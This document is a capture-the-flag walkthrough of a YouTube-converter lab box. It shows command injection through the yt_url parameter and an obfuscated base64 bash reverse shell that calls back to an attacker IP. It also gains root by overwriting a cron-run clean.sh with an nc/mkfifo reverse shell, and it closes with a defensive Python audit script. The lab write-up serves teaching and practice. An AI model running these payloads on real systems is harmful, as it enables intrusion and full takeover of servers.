
# ConvertMyVideo

## Nmap

```
sudo nmap 10.10.50.86 -p- -sS -sV

PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
```

Port 80 lands us on a YouTube video conversion page.

![](/files/-MXE9-_RsS5zykNwM_Gk)

Running feroxbuster against the target website produces only a few results, of which only the `/admin` directory is interesting. The `/admin` directory uses an HTTP basic authentication form, and I was unable to crack it using rockyou.txt with common usernames such as 'admin'.

![](/files/-MXE9QG0aCY1aE3I2stD)

Running a generic query does not produce anything interesting.

![](/files/-MXE9ijHbPS56gLEN0gQ)

Running the search query through Burp Suite gives us the parameter `yt_url`.

![](/files/-MXEA8rl1LUxrb4DZg_i)

Using the link below as a reference, we can try various command injection techniques against the parameter.

<https://book.hacktricks.xyz/pentesting-web/command-injection>

As per the link, trying the following gives us a command injection result:

```
yt_url=ls||id;
```

![](/files/-MXEB0KRrJi_3SCeSM7z)

Knowing we can inject commands, we can attempt a reverse shell by running the command below in a terminal on our attacking machine, then taking the output and using it in our command injection:

```
echo "echo $(echo 'bash -i >& /dev/tcp/10.14.3.108/4444 0>&1' | base64 | base64)|ba''se''6''4 -''d|ba''se''64 -''d|b''a''s''h" | sed 's/ /${IFS}/g'
```

![](/files/-MXEBT0PtdRp5GR0aOnN)

Then paste the output into Burp Suite:

![](/files/-MXEBdo0MxVsIJRfXTqI)

Once sent, we should receive a reverse shell on the `netcat` listener.

![](/files/-MXEBrYsl3Wn_jKepXuF)

After looking about the machine and running enumeration scripts, I was unable to identify any points of escalation. I then decided to run [pspy64](https://github.com/DominicBreuker/pspy/releases) to see if anything is being executed on a regular basis.

After transferring and running it, we get the following results:

![](/files/-MXENqc8FbKaBjNrHhcu)

Frequently the following is being run:

`/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh`

From here I echoed out the contents of `clean.sh` and replaced the contents with a `netcat` reverse shell.

```
echo  > clean.sh
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.14.3.108 4444 >/tmp/f' > clean.sh
```

I then set up a listener on port 4444, waited a few seconds and received a shell as root.

![](/files/-MXEQS2X_aUR4KX_Sxv1)
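
The escalation above works because a job running as root executes a script that the web server user can overwrite. The following Python script is an added example, not part of the original write-up: it takes a privileged job's command line (here the one seen in the pspy output) and reports every path component that a non-root user could modify or replace. The function names and the `trusted_uids` / `stop_at` parameters are assumptions made for this example.

```python
import os
import shlex
import stat

def script_paths(cmdline):
    """Absolute paths named in a process command line (as logged by a process monitor)."""
    return [tok for tok in shlex.split(cmdline) if tok.startswith("/")]

def audit_path(path, trusted_uids=frozenset({0}), stop_at="/"):
    """Walk from path up to stop_at and report every component that a user
    outside trusted_uids could modify or replace."""
    findings = []
    cur, stop = os.path.realpath(path), os.path.realpath(stop_at)
    while True:
        try:
            st = os.stat(cur)
        except FileNotFoundError:
            # A missing component can be created by whoever controls its parent.
            findings.append((cur, "missing"))
        else:
            # A sticky world-writable directory (like /tmp) does not let other
            # users replace entries they do not own.
            sticky_dir = stat.S_ISDIR(st.st_mode) and st.st_mode & stat.S_ISVTX
            if st.st_uid not in trusted_uids:
                findings.append((cur, f"owned by uid {st.st_uid}"))
            if st.st_mode & stat.S_IWOTH and not sticky_dir:
                findings.append((cur, "world-writable"))
            if st.st_mode & stat.S_IWGRP and st.st_gid != 0:
                findings.append((cur, f"group-writable by gid {st.st_gid}"))
        parent = os.path.dirname(cur)
        if cur == stop or parent == cur:
            break
        cur = parent
    return findings

def audit_cmdline(cmdline, **kwargs):
    """Audit every absolute path in a privileged job's command line."""
    return {p: audit_path(p, **kwargs) for p in script_paths(cmdline)}

if __name__ == "__main__":
    # Command line taken from the pspy output above; run this on the host being reviewed.
    job = "/bin/sh -c cd /var/www/html/tmp && bash /var/www/html/tmp/clean.sh"
    for path, issues in audit_cmdline(job).items():
        for where, why in issues:
            print(f"{path}: {where} is {why}")
```

Any finding for a path that root executes means the job should be moved to a root-owned location with no group or world write access on the script or its parent directories.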
